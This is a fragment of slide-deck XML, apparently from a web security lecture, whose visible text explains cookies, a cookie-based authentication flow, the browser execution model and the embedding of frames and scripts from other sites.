        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3063875"/>
            <a:ext cx="1143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3193" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2830513"/>
            <a:ext cx="400050" cy="385762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252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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3194" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1920875"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373195" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23780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3196" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3626778" y="1905000"/>
            <a:ext cx="1088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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373197" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="26066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3198" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2667000"/>
            <a:ext cx="4800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HTTP Header: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Set-cookie:	NAME=VALUE ;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	domain = (who can read) ;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	expires = (when expires) ;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	secure = (only over SSL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373199" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5029200"/>
            <a:ext cx="1128713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3200" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="5129213"/>
            <a:ext cx="9144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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373201" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5867400"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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3202" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="6096000"/>
            <a:ext cx="1143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3203" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="5862638"/>
            <a:ext cx="400050" cy="385762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252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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3204" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="4953000"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373205" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="528002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3206" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5334000"/>
            <a:ext cx="2924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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373207" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3521075" y="6407150"/>
            <a:ext cx="5194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None/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US"/>
              <a:t>HTTP is stateless protocol; cookies add state</a:t>
            </a:r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1373208" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="47244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130300" y="3657600"/>
            <a:ext cx="2984500" cy="714375"/>
            <a:chOff x="712" y="2304"/>
            <a:chExt cx="1880" cy="450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373210" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="712" y="2304"/>
              <a:ext cx="1331" cy="45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If expires=NULL:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>this session only</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373211" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2016" y="2496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331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3199" grpId="0" animBg="1"/>
      <p:bldP spid="1373200" grpId="0" animBg="1"/>
      <p:bldP spid="1373201" grpId="0" animBg="1"/>
      <p:bldP spid="1373202" grpId="0" animBg="1"/>
      <p:bldP spid="1373203" grpId="0" animBg="1"/>
      <p:bldP spid="1373204" grpId="0" animBg="1"/>
      <p:bldP spid="1373205" grpId="0" animBg="1"/>
      <p:bldP spid="1373206" grpId="0"/>
      <p:bldP spid="1373207" grpId="0"/>
      <p:bldP spid="137320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9" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8458200" y="1143000"/>
            <a:ext cx="533400" cy="9906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3016" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="533400" cy="9906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Cookie authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323012" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="2133600"/>
            <a:ext cx="1219200" cy="43434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3013" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2133600"/>
            <a:ext cx="1219200" cy="43434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3014" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2133600"/>
            <a:ext cx="1219200" cy="43434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23015" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1736725"/>
            <a:ext cx="109061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/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323017" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4154488" y="1752600"/>
            <a:ext cx="1484312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/>
              <a:t>Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323018" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7593013" y="1752600"/>
            <a:ext cx="1474787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/>
              <a:t>Auth server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600200" y="2222500"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="1400"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323020" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1008" y="1632"/>
              <a:ext cx="1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3021" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1164" y="1400"/>
              <a:ext cx="1328" cy="44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POST login.cgi</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Username &amp; pwd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5486400" y="2527300"/>
            <a:ext cx="2106613" cy="396875"/>
            <a:chOff x="3456" y="1592"/>
            <a:chExt cx="1327" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323022" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="1842"/>
              <a:ext cx="13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3023" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="1592"/>
              <a:ext cx="1031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Validate user</a:t>
              </a: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5486400" y="3260725"/>
            <a:ext cx="3429000" cy="717550"/>
            <a:chOff x="3456" y="2054"/>
            <a:chExt cx="2160" cy="452"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 34"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="2054"/>
              <a:ext cx="1392" cy="250"/>
              <a:chOff x="3456" y="2054"/>
              <a:chExt cx="1392" cy="250"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1323024" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3456" y="2256"/>
                <a:ext cx="13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23025" name="Text Box 17"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="2054"/>
                <a:ext cx="850" cy="250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 type="none" w="lg" len="med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9900"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>auth=val</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323027" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4877" y="2256"/>
              <a:ext cx="739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Store val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1600200" y="3336925"/>
            <a:ext cx="2709863" cy="396875"/>
            <a:chOff x="1008" y="2102"/>
            <a:chExt cx="1707" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323028" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1008" y="2304"/>
              <a:ext cx="1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3029" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="2102"/>
              <a:ext cx="1617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Set-cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth=val</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323030" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4191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1600200" y="4403725"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="2774"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323031" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="2976"/>
              <a:ext cx="1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3032" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1064" y="2774"/>
              <a:ext cx="1480" cy="44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GET restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Cookie:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth=val</a:t>
              </a:r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5486400" y="4602163"/>
            <a:ext cx="2209800" cy="701675"/>
            <a:chOff x="3456" y="2899"/>
            <a:chExt cx="1392" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323033" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="3120"/>
              <a:ext cx="1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3034" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="2899"/>
              <a:ext cx="1140" cy="44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restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>auth=val</a:t>
              </a:r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5486400" y="5562600"/>
            <a:ext cx="2209800" cy="396875"/>
            <a:chOff x="3456" y="3504"/>
            <a:chExt cx="1392" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323035" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3456" y="3552"/>
              <a:ext cx="1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3036" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3832" y="3504"/>
              <a:ext cx="668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YES/NO</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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1689100" y="5562600"/>
            <a:ext cx="2465388" cy="701675"/>
            <a:chOff x="1064" y="3504"/>
            <a:chExt cx="1553" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323037" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1064" y="3744"/>
              <a:ext cx="15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3038" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="3504"/>
              <a:ext cx="1440" cy="44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If YES,  </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>      restricted.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323048" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7661275" y="4876800"/>
            <a:ext cx="125412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Check val</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342231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30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Content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r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Reported Web Vulnerabilities "In the Wild"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825500" y="5943600"/>
            <a:ext cx="80899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latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data from aggregator and validator of  NVD-reported vulnerabilities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823595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Rendering and events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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Basic execution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each browser window or frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Renders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes HTML and scripts to display page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>May involve images, subframes, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Events can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User actions: OnClick, OnMouseover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rendering: OnLoad, OnBeforeUnload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Timing: setTimeout(),  clearTimeout() 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0772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Pages can embed content from many sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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85800" y="1676400"/>
            <a:ext cx="8458200" cy="441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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/frame.html”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&gt;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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>script   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/script.js”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
